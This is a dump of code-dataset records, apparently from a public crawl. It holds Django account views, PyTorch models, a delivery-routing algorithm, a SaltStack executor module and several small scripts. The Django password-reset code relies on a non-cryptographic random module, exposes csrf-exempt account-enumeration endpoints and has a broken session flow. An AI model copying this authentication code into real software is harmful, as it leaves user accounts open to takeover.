g_score.get(current, INF) + d\n if tentative_g_score < g_score.get(neighbor, INF):\n # This path to neighbor is the best one seen so far\n came_from[neighbor] = current\n g_score[neighbor] = tentative_g_score\n f_score[neighbor] = g_score[neighbor] + h(neighbor, goal)\n\n if neighbor not in open_set:\n open_set.append(neighbor)\n","sub_path":"step3/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"19200498","text":"from django.shortcuts import render,redirect\nfrom api.models import Teacher,Company,BaseUser\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import resolve_url\nfrom django.template.response import TemplateResponse\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.debug import sensitive_post_parameters\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\n\ndef main(request):\n if request.user.pk == None :\n return redirect('teacher_main')\n elif request.user.user_type==0:\n return redirect('teacher_main')\n else :\n return redirect('office_main')\n\ndef register_select(request):\n return render(request, 'register_select.html')\n\n\ndef check_type(request):\n if request.user.user_type==0:\n return redirect('teacher_main')\n return redirect('office_main')\n\n@sensitive_post_parameters()\n@csrf_protect\n@never_cache\ndef login(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n user=form.get_user()\n auth_login(request, user)\n if user.user_type==0:\n redirect_to = resolve_url('/teacher/main/')\n else :\n redirect_to = resolve_url('/office/main/')\n return HttpResponseRedirect(redirect_to)\n else:\n form = AuthenticationForm(request)\n\n return TemplateResponse(request, 'login.html', {'form': form})\n\n@csrf_exempt\ndef id_check(request):\n if request.method==\"POST\":\n username=request.POST['id']\n\n count=BaseUser.objects.filter(username=username).count()\n if count>0 :\n return HttpResponse(json.dumps(\"\"), status=201)\n return HttpResponse(json.dumps(\"\"),status=200)\n return HttpResponse(status=400)\n\n@csrf_exempt\ndef email_check(request):\n if request.method==\"POST\":\n email=request.POST['email']\n\n count=BaseUser.objects.filter(email=email).count()\n if count>0 :\n return HttpResponse(json.dumps(\"\"), status=201)\n return HttpResponse(json.dumps(\"\"),status=200)\n return HttpResponse(status=400)\n\ndef find_user(request):\n if request.user.pk==None:\n return None\n elif request.user.user_type==0:\n return Teacher.objects.get(pk=request.user.pk)\n else :\n return Company.objects.get(pk=request.user.pk)\n\n\nfrom django.core.mail import EmailMessage\nimport random\nimport base64\n\ndef code_send(request,user):\n random_num = random.randrange(100000, 999999)\n auth_num = base64.b64encode(str(random_num).encode('ascii'))\n auth_num = auth_num.decode(\"utf-8\")\n\n request.session['tmp_auth_num'] = auth_num\n\n content = \"인증번호는 \\'\" + auth_num + \"\\' 입니다\"\n email_instance = EmailMessage('Eduboby 인증번호', content, to=[user.email])\n email_instance.send()\n\ndef email_resend(request):\n user=BaseUser.objects.get(pk=request.session['tmp_user'])\n code_send(request,user)\n return render(request, \"code_input.html\", {'is_resend':True})\n\ndef find_pwd_by_email(request):\n if request.method=='POST':\n email=request.POST['email']\n user=BaseUser.objects.filter(email=email)\n if user.count()==0:\n return render(request, \"find_pwd.html\", {'error2': True})\n\n user=user.first()\n\n if not user.username == request.POST['username']:\n return render(request, \"find_pwd.html\", {'error':True})\n request.session['tmp_user'] = user.pk\n\n code_send(request,user)\n return redirect('input_code')\n\n return render(request, \"find_pwd.html\")\n\ndef input_code(request):\n if request.session.get('tmp_auth_num') == None :\n return redirect('find_pwd_by_email')\n\n if request.method==\"POST\":\n auth_num = request.POST['auth_num']\n if auth_num == request.session['tmp_auth_num']:\n request.session.pop('tmp_auth_num')\n request.session.pop('tmp_user')\n return redirect('password_reset')\n else:\n return render(request, \"code_input.html\", {'error':True})\n\n return render(request, \"code_input.html\")\ndef find_id_by_email(request):\n if request.method==\"POST\":\n email=request.POST['email']\n user=BaseUser.objects.filter(email=email)\n if user.count()==0 :\n return render(request, \"find_id.html\", {'error': True})\n\n\n user=user.first()\n\n content=\"회원님의 아이디는 \\'\"+user.username +\"\\' 입니다.\"\n email_instance = EmailMessage('Eduboby 아이디 찾기', content, to=[email])\n email_instance.send()\n return render(request, \"find_id.html\", {'sended':True})\n\n return render(request, \"find_id.html\")\n\ndef password_reset(request):\n if request.method==\"POST\":\n if not request.POST['password']==request.POST['password_re']:\n return render(request, \"password_reset.html\", {'error':True})\n\n\n user=BaseUser.objects.get(pk=request.session['tmp_user'])\n\n user.set_password(request.POST['password'])\n user.save();\n return redirect('login')\n\n return render(request,\"password_reset.html\")\n\n\n\n\n\n","sub_path":"eduboby/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61821531","text":"'''\nmain base class and module class construction for rig\n'''\n\nimport maya.cmds as mc\nfrom . import controls\n\n\nclass RigModule():\n\n '''\n class for creating rig modules\n '''\n\n def __init__(\n self,\n name='new',\n baseRig=None,\n ):\n '''\n @param name: str, name for module\n @param baseRig: instance of baseRig class module\n '''\n\n # check if any current modules in scene\n if mc.objExists('{0}*_module'.format(name)):\n amount = len(mc.ls('{0}*_module'.format(name))) + 1\n else:\n amount = 1\n\n self.moduleName = '{0}{1:02d}'.format(name, amount)\n\n # create module group structure\n self.topGrp = mc.group(n='{0}_module'.format(self.moduleName), em=1)\n\n self.jointsGrp = mc.group(n='{0}_joints'.format(self.moduleName), em=1, p=self.topGrp)\n self.mechGrp = mc.group(n='{0}_mech'.format(self.moduleName), em=1, p=self.topGrp)\n self.noTransGrp = mc.group(n='{0}_noTrans'.format(self.moduleName), em=1, p=self.topGrp)\n\n mc.hide(self.mechGrp, self.noTransGrp)\n mc.setAttr('{0}.it'.format(self.noTransGrp), 0, l=1)\n\n # add attributes\n mc.addAttr(self.topGrp, ln='rigModule', dt='string')\n mc.setAttr('{0}.{1}'.format(self.topGrp, 'rigModule'),\n self.moduleName, type='string', l=1)\n\n # parent module to base class\n if baseRig:\n mc.parent(self.topGrp, baseRig.modulesGrp)\n if not baseRig:\n if mc.objExists('modules_grp'):\n mc.parent(self.topGrp, 'modules_grp')\n","sub_path":"autoRig/Base/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"168898100","text":"import threading\ndef contar(numero):\n contador = 0\n while 1:\n contador+=1\n print(numero, threading.get_ident(), contador)\n\nfor numero in range(1, 11):\n hilo = threading.Thread(target=contar,\n args=(numero,),\n daemon=True)\n hilo.start()\n\n\n# Obtiene hilo principal\nhilo_ppal = threading.main_thread()\n# Recorre hilos activos para controlar estado de su ejecución\nfor hilo in threading.enumerate():\n # Si el hilo es hilo_ppal continua al siguiente hilo activo\n if hilo is hilo_ppal:\n continue\n # Se obtiene información hilo actual y núm. hilos activos\n print(hilo.getName(),\n hilo.ident,\n hilo.isDaemon(),\n threading.active_count())\n # El programa esperará a que este hilo finalice:\n hilo.join()","sub_path":"rddtool/hiloEX.py","file_name":"hiloEX.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"589991407","text":"\n\n#calss header\nclass _ASSAULT():\n\tdef __init__(self,): \n\t\tself.name = \"ASSAULT\"\n\t\tself.definitions = [u'a violent attack: ', u'a determined or serious attempt to do something difficult: ', u'a threat to injure someone followed by a violent attack on them ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_assault.py","file_name":"_assault.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"557426010","text":"import torch\nimport torch.nn as nn\nimport math\nimport torch\nfrom torch.nn import functional as F\nfrom torch import nn\nfrom torch.distributions import constraints\nfrom torchvision.datasets import MNIST\nfrom torchvision import transforms as tvt\nfrom neural_networks.layers import ConvBlock, UpResBloc, Reshape\nimport pyro\nfrom pyro import infer, optim, poutine\nfrom pyro import distributions as D\nfrom galaxy_gen.forward_models import random_pose_transform\nfrom galaxy_gen.backward_models import delta_sample_transformer_params\nfrom galaxy_gen.etn import transformers, networks\nfrom galaxy_gen.etn import transforms as T\nfrom galaxy_gen.etn import coordinates\n\nfrom kornia import augmentation\nfrom torch.utils.tensorboard import SummaryWriter\nimport torchvision\nimport os\nimport glob\n\n\nclass Encoder(nn.Module):\n \"\"\"\n Will take any insize as long as it is divisible by 8\n output is a dictionary with four variables\n dictionary[\"transform\"] is a transformation\n dctionary[\"transform_params\"] are parameters that parameterise that \n transformation\n dictionary[\"z_mu\"] is the mean of the latent variable\n dictionary[\"std_mu\"] is the standard dev of that latent variable\n so the latent space is the z and std in this transformed coordinate frame\n We output the theta that parameterises this coordinate frame\n and the z in this transformed coordinate frame\n\n \"\"\"\n def __init__(self,\n transformer: transformers.Transformer,\n insize=56, z_dim=10):\n super().__init__()\n self.transformer = transformer\n self.insize = insize\n self.linear_size = int(((insize/16)**2)*16)\n self.net = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # second conv pair\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.Conv2d(32, 32, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # third conv\n nn.Conv2d(32, 16, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # fourth conv\n nn.Conv2d(16, 16, kernel_size=3, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(2),\n # linear\n\n # linear\n\n )\n\n self.loc = nn.Linear(int(self.linear_size), z_dim)\n self.scale = nn.Linear(int(self.linear_size), z_dim)\n self.relu = nn.ReLU()\n \n def forward(self, x):\n output = {}\n transform_output = self.transformer(x)\n output[\"transform\"] = transform_output[\"transform\"]\n output[\"transform_params\"] = transform_output[\"params\"]\n \n grid = coordinates.identity_grid(\n [self.insize, self.insize], device=x.device\n )\n grid = grid.expand(x.shape[0], *grid.shape)\n\n transformed_grid = output[\"transform\"][-1](grid)\n \n x = x - 0.222 # lol this complicates switching datasets severely\n x = x / 0.156\n\n view = T.broadcasting_grid_sample(x, transformed_grid)\n\n output[\"view\"] = view # might want this later as well\n\n split = self.net(view)\n split = self.relu(split)\n reshape = split.view(-1, self.linear_size)\n z_loc = self.loc(reshape)\n z_scale = torch.exp(self.scale(reshape))\n\n output[\"z_mu\"] = z_loc\n output[\"z_std\"] = z_scale\n\n return output, split\n\nclass Decoder(nn.Module):\n def __init__(self, z_dim=10, outsize=56):\n super().__init__()\n self.z_dim = z_dim\n self.outsize = outsize\n self.linear_size = int((outsize/8)**2)\n self.linear = nn.Linear(z_dim, self.linear_size)\n self.net = nn.Sequential(\n nn.ELU(),\n UpResBloc(1, 32),\n nn.ELU(),\n nn.BatchNorm2d(32),\n ConvBlock(32, bias=False),\n UpResBloc(32, 32),\n nn.ELU(),\n ConvBlock(32, bias=False),\n ConvBlock(32, bias=False),\n UpResBloc(32, 1),\n nn.Sigmoid()\n )\n \n def forward(self, z):\n z = self.linear(z)\n z = torch.reshape(z, (-1, 1, int(self.outsize/8), int(self.outsize/8)))\n loc_img = self.net(z)\n return loc_img\n\n\n\nif __name__ == \"__main__\":\n x = torch.zeros([10, 1, 80, 80])\n transformers = transformers.TransformerSequence(\n transformers.Translation(networks.EquivariantPosePredictor, 1, 32),\n transformers.Rotation(networks.EquivariantPosePredictor, 1, 32))\n\n encoder = Encoder(transformers, insize=80, z_dim=10)\n decoder = Decoder(z_dim=10, outsize=80)\n x = encoder(x)\n x = x[\"z_mu\"]\n x = decoder(x)\n\n \n","sub_path":"neural_networks/encoder_decoder.py","file_name":"encoder_decoder.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"544020571","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\n\nfilename1 = \"data/train_x.csv\"\nfilename2 = \"data/train_y.csv\"\nfilename3 = \"data/test_x.csv\"\n\ndf1 = pd.read_csv(filename1)\ndf2 = pd.read_csv(filename2)\ndf3 = pd.read_csv(filename3)\n\nx_train = df1.values\ny_train = df2.values\nx_test = df3.values\n\n\nn_dims = len(x_train[0])\nn_samples = len(x_train)\nn_test = len(x_test)\n\nprint(np.shape(x_train[0]))\n\n\nX = tf.placeholder('float',[n_dims,1])\nY = tf.placeholder('float',[1])\nw = tf.Variable(tf.zeros([1,n_dims]))\nb = tf.Variable(tf.zeros([1]))\n\nY_predict = tf.matmul(w, X) + b\n\nloss = tf.square(Y-Y_predict,name=\"loss\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n writer = tf.summary.FileWriter('./graphs/linear_model', sess.graph)\n for i in range(1000):\n total_loss = 0\n for j in range(n_samples):\n x = x_train[j].reshape(n_dims,1)\n y = y_train[j].reshape(1)\n _, l = sess.run([optimizer,loss],feed_dict={X: x, Y: y})\n total_loss += l\n print('Epoch {0}: {1}'.format(i, total_loss / n_samples))\n\n w_out, b_out = sess.run([w, b])\n print(w_out, b_out)\n\nresult = []\nfor i in range(n_test):\n x = x_test[i].reshape(n_dims,1)\n y_predict = int(np.matmul(w_out,x)+ b_out)\n print(y_predict)\n result.append([y_predict])\n\ndf4 = pd.DataFrame(result,index=False,columns=None)\ndf4.to_csv(\"data/test_y.csv\")","sub_path":"bicycle_rent_linear_reg/linear_model.py","file_name":"linear_model.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26228986","text":"\r\n# Brian Parsons\r\n# Student ID - 001008912\r\n# C950 - Data Structures & Algorithms II\r\n# Performance Assessment\r\n\r\nimport distances\r\nimport copy\r\nfrom hashTable import hashtable\r\n\r\n# reads csv and populates a graph with addresses and weights\r\ndistance_graph = distances.get_graph('WGUPS Distances.csv')\r\ndistance_graph.populate_address(hashtable)\r\n\r\n# B1 - Pseudocode to show algorithm's process\r\n# While packages remain in the list\r\n# for each package\r\n# if at start, go forward\r\n# find the next package with the shortest shipping address distance\r\n# remove the used package from the list\r\n\r\n# B3 - Big O Notation = O(n^2)\r\n\r\n# Greedy algorithm. Chooses smallest length first out of given list\r\n\r\n\r\n# O(n)\r\ndef greedy_path(path, start='4001 South 700 East'):\r\n\r\n # gets the list of distances from the graph made by the graph file\r\n weight_list = distance_graph.edge_weights\r\n address_list = copy.copy(path)\r\n\r\n # takes a starting point as input\r\n # note: starting point should not already be part of path\r\n greed_path = [start]\r\n\r\n while len(address_list) != 0:\r\n\r\n minimum = [0, start]\r\n for address in address_list:\r\n\r\n # skips address if the start address and end address are the same\r\n if address == start:\r\n continue\r\n\r\n # compares distances for each address from the last entry in greed_path\r\n # minimum distance is stored with its address\r\n distance = weight_list[greed_path[-1], address]\r\n if minimum[0] == 0:\r\n minimum = [distance, address]\r\n if distance < minimum[0] and distance != 0:\r\n minimum = [distance, address]\r\n\r\n # appends the new minimum distance address to greed_path and removes from remaining list\r\n if minimum[1] not in greed_path:\r\n greed_path.append(minimum[1])\r\n address_list.remove(minimum[1])\r\n\r\n # removes the hub from the new path\r\n # makes future comparisons much easier\r\n if '4001 South 700 East' in greed_path:\r\n greed_path.remove('4001 South 700 East')\r\n return greed_path\r\n\r\n\r\n# O(n)\r\ndef total_distance(path):\r\n\r\n # gives a cumulative total distance of a path based on distance_graph weights\r\n weight_list = distance_graph.edge_weights\r\n total = 0\r\n for i in range(0, len(path) - 1):\r\n total += weight_list[path[i], path[i+1]]\r\n\r\n # adds the distance from last index in path to hub since all trucks return to hub\r\n total += weight_list[path[-1], '4001 South 700 East']\r\n return total\r\n\r\n\r\n# O(n)\r\ndef current_distance(path, address):\r\n\r\n # same as total_distance, but only calculates until a given address\r\n # will use this to see if a truck has gone far enough to have 'visited' address\r\n weight_list = distance_graph.edge_weights\r\n total = 0\r\n for i in range(0, path.index(address)):\r\n total += weight_list[path[i], path[i+1]]\r\n return total\r\n\r\n\r\n# making trucks into a class will make keeping up with packages, addresses, and time much easier\r\nclass Truck:\r\n def __init__(self):\r\n\r\n self.packages = []\r\n self.route = []\r\n self.start_time = 'None'\r\n\r\n # total distance of truck route\r\n self.length = 0\r\n\r\n # O(n)\r\n def insert(self, address):\r\n\r\n # inserting addresses instead of just packages so that packages going to same address are loaded together\r\n # this makes the sorting algorithm more efficient as # addresses will always be <= # packages\r\n self.route.append(address)\r\n for package in distance_graph.address_list[address]:\r\n self.packages.append(package)\r\n\r\n # O(n)\r\n def remove(self, address):\r\n\r\n # removes address from truck route\r\n self.route.remove(address)\r\n\r\n # removes all packages associated with removed address\r\n for item in distance_graph.address_list[address]:\r\n self.packages.remove(item)\r\n\r\n # recalculates route distance\r\n self.length = total_distance(self.route)\r\n\r\n # O(1)\r\n def individual_insert(self, package):\r\n\r\n if package[1] != '':\r\n\r\n # if the package has an address, this will insert the address and package individually\r\n self.route.append(package[1])\r\n self.packages.append(package)\r\n\r\n # removes hub address to make greed algorithm work\r\n self.route.remove('4001 South 700 East')\r\n self.route = greedy_path(self.route)\r\n\r\n # inserts hub address at the beginning for accurate total_distance calculation\r\n self.route.insert(0, '4001 South 700 East')\r\n self.length = total_distance(self.route)\r\n\r\n # O(1)\r\n def leave_hub(self, time):\r\n\r\n # sets a start time to be compared to for distance calculations\r\n self.start_time = time\r\n\r\n # edits status of package\r\n for package in self.packages:\r\n package[8] = 'En Route'\r\n\r\n # O(n^2)\r\n def passed_time(self, time):\r\n\r\n if self.start_time != 'None':\r\n\r\n # sees how much time has passed since truck left hub (in minutes)\r\n delta_time = time - self.start_time\r\n\r\n # trucks go 18 mi/hr == 0.3 mi/min\r\n distance_traveled = delta_time * 0.3\r\n for location in self.route:\r\n\r\n # check each location on the route to see if it has been reached\r\n if distance_traveled > current_distance(self.route, location):\r\n for item in distance_graph.address_list[location]:\r\n\r\n # if location has been reached, goes through all of the items in the truck associated\r\n # with that location and 'delivers'\r\n if item in self.packages:\r\n item[8] = 'Delivered'\r\n self.packages.remove(item)\r\n print('Package %d Delivered' % item[0])\r\n\r\n\r\n# initializes the 3 trucks as well as an address list to load packages from\r\nt1 = Truck()\r\nt2 = Truck()\r\nt3 = Truck()\r\naddresses = []\r\n\r\n\r\n# O(5n^2)\r\ndef load_trucks():\r\n\r\n for address in distance_graph.address_list:\r\n\r\n # doesn't check hub address as no packages will go here\r\n # makes a list of addresses to check for packages with set criteria\r\n if address != '4001 South 700 East':\r\n addresses.append(address)\r\n\r\n # puts all packages with the earliest due time into truck1 as it will leave first\r\n for item in distance_graph.address_list[address]:\r\n if item[5] == '9:00':\r\n t1.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n # this will be used as an index so the high priority packages aren't moved from their point in queue\r\n checker1 = t1.route.index(t1.route[-1])\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # loads items with time constraints and special notes second since they have both priority\r\n # and special parameters\r\n if item[5] == '10:30' and item[7] != '':\r\n\r\n # since it would be impossible to code for all possible special notes, user is prompted to load\r\n # these manually based on the special notes\r\n print(\"Package %d has special note: %s\\nLoad into which truck?\\n(1, 2, 3)\" % (item[0], item[7]))\r\n truck = input()\r\n if truck == '1':\r\n t1.insert(address)\r\n elif truck == '2':\r\n t2.insert(address)\r\n elif truck == '3':\r\n t3.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # next the packages with time constraints but no special notes are loaded\r\n if item[5] == '10:30':\r\n\r\n # the total distance change is compared between truck 1 and 2 using a greedy algorithm\r\n # the algorithm will run multiple times, making this not exactly efficient\r\n # however, it gives better results than just adding an item to the end of the list\r\n delta1 = total_distance(greedy_path(t1.route + [address], t1.route[checker1])) - \\\r\n total_distance(greedy_path(t1.route, t1.route[checker1]))\r\n delta2 = total_distance(greedy_path(t2.route + [address])) \\\r\n - total_distance(greedy_path(t2.route))\r\n\r\n # truck 1 will leave before truck 2, so I gave time restricted packages a slight bias for truck 1\r\n if delta1 < delta2 + 1:\r\n t1.insert(address)\r\n else:\r\n t2.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n # sorts addresses, leaving the higher time priority packages in place in queue\r\n # checker indexes will secure the place in queue for the time priority packages\r\n t1.route = greedy_path(t1.route, t1.route[checker1])\r\n checker1 = t1.route.index(t1.route[-1])\r\n t2.route = greedy_path(t2.route)\r\n checker2 = t2.route.index(t2.route[-1])\r\n\r\n for address in addresses:\r\n for item in distance_graph.address_list[address]:\r\n\r\n # next are the packages with special notes but no time constraints\r\n # these are also loaded manually\r\n if item[7] != '':\r\n print(\"Package %d has special note: %s\\nLoad into which truck?\\n(1, 2, 3)\" % (item[0], item[7]))\r\n truck = input()\r\n if truck == '1':\r\n t1.insert(address)\r\n elif truck == '2':\r\n t2.insert(address)\r\n elif truck == '3':\r\n t3.insert(address)\r\n\r\n # removes address from list to avoid redundancies\r\n addresses.remove(address)\r\n break\r\n\r\n for address in addresses:\r\n\r\n # at this point, the 16 package limit becomes a concern, so we need to start tracking that\r\n # counts the number of packages associated with an address\r\n packages = 0\r\n for item in distance_graph.address_list[address]:\r\n packages += 1\r\n\r\n # just like before, compares the total distances after greed sort starting at the checker indexes\r\n delta1 = total_distance(greedy_path(t1.route + [address], t1.route[checker1])) - total_distance(\r\n greedy_path(t1.route, t1.route[checker1]))\r\n delta2 = total_distance(greedy_path(t2.route + [address], t2.route[checker2])) - total_distance(\r\n greedy_path(t2.route, t2.route[checker2]))\r\n\r\n # looks at truck 3 as well\r\n # if truck 3 has no packages, compares instead to the distance from the hub to the address\r\n if len(t3.route) > 0:\r\n delta3 = total_distance(greedy_path(t3.route + [address])) - total_distance(greedy_path(t3.route))\r\n else:\r\n delta3 = distance_graph.edge_weights[address, '4001 South 700 East']\r\n\r\n # inserts into the truck with the smallest delta AND won't be overfilled\r\n if delta1 < delta2 and delta1 < delta3 and len(t1.packages) + packages <= 16:\r\n t1.insert(address)\r\n elif delta2 < delta3 and len(t2.packages) + packages <= 16:\r\n t2.insert(address)\r\n else:\r\n t3.insert(address)\r\n\r\n # sorts the new addresses into new list without interfering with the old queue\r\n append1 = greedy_path(t1.route[checker1:], t1.route[checker1])\r\n append2 = greedy_path(t2.route[checker2:], t2.route[checker2])\r\n\r\n # adds the new lists to the end of the old without interrupting the time-priority queue\r\n t1.route = t1.route[:checker1] + append1\r\n t2.route = t2.route[:checker2] + append2\r\n t3.route = greedy_path(t3.route)\r\n\r\n # adds the hub as the first index in each route in order to calculate total distance\r\n t1.route.insert(0, '4001 South 700 East')\r\n t2.route.insert(0, '4001 South 700 East')\r\n t3.route.insert(0, '4001 South 700 East')\r\n\r\n # calculates the total distance of each route\r\n t1.length = total_distance(t1.route)\r\n t2.length = total_distance(t2.route)\r\n t3.length = total_distance(t3.route)\r\n","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":12595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270769938","text":"def solution():\n inputString = input()\n inputString = inputString.split(' ')\n timeNeed = int(inputString[0])\n d = float(float(inputString[1])/100)\n k = float(float(inputString[2])/100)\n probs = [d]\n temp = d\n max_hundred = 1\n while temp < 1:\n temp += (temp*k)\n probs.append(temp)\n max_hundred += 1\n answer = 0.0\n i = 1\n probs[-1] = 1.0\n while i <= max_hundred:\n temp = timeNeed * i\n for j in range(i):\n if j == i-1:\n temp *= probs[j]\n else:\n temp *= (1-probs[j])\n answer += temp\n i += 1\n print(answer)\n\n\nsolution()\n","sub_path":"BOJ/UCPC/heykakao.py","file_name":"heykakao.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"81498393","text":"from __future__ import absolute_import\n\nimport logging\nfrom pathlib import Path\n\nimport salt.utils\nimport salt.ext.six as six\n\n__virtualname__ = 'niteststand_remote_executor'\n\nlog = logging.getLogger(__name__)\n\nexecutor_path = \"C:\\\\Program Files\\\\\" \\\n \"National Instruments\\\\TestStand Executor\\\\\" \\\n \"NationalInstruments.TestStandExecutor.exe\"\n\n\ndef __virtual__():\n return __virtualname__\n\n\ndef _executor_installed():\n path = Path(executor_path)\n return path.exists()\n\n\ndef _get_webservice_user(**kwargs):\n webservice_user = None\n for key, value in kwargs.items():\n if key == '__pub_metadata':\n webservice_user = value['ws_user']\n return webservice_user\n\n\ndef execute(sequence_file, local_properties, **kwargs):\n webservice_user = _get_webservice_user(**kwargs)\n arg = '{0} execute \"{1}\" -v'.format(executor_path, sequence_file)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n for property in local_properties:\n arg = '{0} {1}'.format(arg, property)\n return __salt__['cmd.run_all'](arg, python_shell=False)\n\n\ndef can_execute(sequence_file, **kwargs):\n ret = {\n 'can_execute': True\n }\n if not _executor_installed():\n ret['can_execute'] = False\n arg = '{0} find \"{1}\" -v'.format(executor_path, sequence_file)\n webservice_user = _get_webservice_user(**kwargs)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n find_cmd_ret = __salt__['cmd.run_all'](arg, python_shell=False)\n if find_cmd_ret['retcode'] is not 0:\n ret['can_execute'] = False\n return ret\n\n\ndef list_sequences(pattern=None, **kwargs):\n arg = '{0} list'.format(executor_path)\n if pattern:\n arg = '{0} {1}'.format(arg, pattern)\n webservice_user = _get_webservice_user(**kwargs)\n if webservice_user:\n arg = '{0} -u {1}'.format(arg, webservice_user)\n list_cmd_ret = __salt__['cmd.run_all'](arg, python_shell=False)\n return list_cmd_ret['stdout'].replace('\\r', '').split('\\n')\n","sub_path":"Packages/NiPackages/TestStand Executor/data/ProgramData/National Instruments/salt/var/cache/salt/minion/extmods/modules/niteststand_remote_executor.py","file_name":"niteststand_remote_executor.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"65164028","text":"from flask_wtf import Form\nfrom wtforms import StringField, FloatField, DateField\nfrom wtforms.validators import DataRequired\n\n\nclass NewDepositForm(Form):\n bank = StringField('bank', validators=[DataRequired()])\n account_no = StringField('account_no')\n account_type = StringField('account_type')\n rate_of_interest = FloatField(\"rate_of_interest\")\n date_of_investment = DateField(\"date_of_investment\", format='%d/%m/%Y', render_kw={\"data-format\": \"d/m/Y\"})\n due_date = DateField(\"due_date\", format='%d/%m/%Y', render_kw={\"data-format\": \"d/m/Y\"})\n invested_value = FloatField('invested_value')\n investor = StringField('investor')\n","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568300456","text":"# highScroes\nimport os, pygame, configure, pickle,copy\n\n\nclass OneScore(object):\n \"\"\"docstring for oneScore\"\"\"\n def __init__(self, name, score):\n self.name = name\n self.score = score\n\n def __repr__(self):\n return name + \"\\t\" + str(score)\n\n def __eq__(self, other):\n return (isinstance(other, oneScore) and (self.score > other.score))\n\nclass HighScores(object):\n \"\"\"docstring for highScroes\"\"\"\n def __init__(self):\n self.c = configure.Configure()\n self.allScore = []\n # testCode \n # self.testSave()\n # testCode ends\n self.loadScores()\n\n def loadScores(self):\n # when the player first time plays, no such files\n try:\n with open(\"highscroes.pickle\",\"rb\") as f:\n self.allScore = pickle.load(f)\n print(\"loaded\")\n f.close()\n except:\n pass\n \n def addScores(self, newScore):\n self.allScore.append(newScore)\n self.allScore.sort(key = lambda x: x.score)\n self.allScore.reverse()\n self.allScore = self.allScore[:6]\n\n with open(\"highscroes.pickle\",\"wb\") as f:\n pickle.dump(self.allScore, f)\n print(\"saved \") # testCode\n f.close()\n \n # the main function in the highScores\n def displayScores(self):\n \"\"\" the following template cited from \n http://programarcadegames.com/python_examples/\n f.php?file=pygame_base_template.py\n \"\"\"\n # Define some colors\n BLACK = (0, 0, 0) \n pygame.init()\n \n # Set the width and height of the screen [width, height]\n size = (self.c.WIDTH, self.c.HEIGHT)\n self.screen = pygame.display.set_mode(size)\n \n pygame.display.set_caption(\"HighScores\")\n \n self.drawBackground()\n # Loop until the user clicks the close button.\n self.done = False\n \n # Used to manage how fast the screen updates\n clock = pygame.time.Clock()\n \n # -------- Main Program Loop -----------\n while not self.done:\n # --- Main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.done = True\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.done = True\n print(\"MOUSEBUTTONDOWN\")\n\n # --- Game logic should go here\n \n # --- Drawing code should go here\n self.redrawAll()\n # --- Go ahead and update the screen with what we've drawn.\n pygame.display.flip()\n \n # --- Limit to 60 frames per second\n clock.tick(self.c.FPS)\n \n # Close the window and quit.\n\n def drawBackground(self):\n self.bgPath = self.c.IMAGE_PATH + \"highScores.png\"\n self.bgImage = 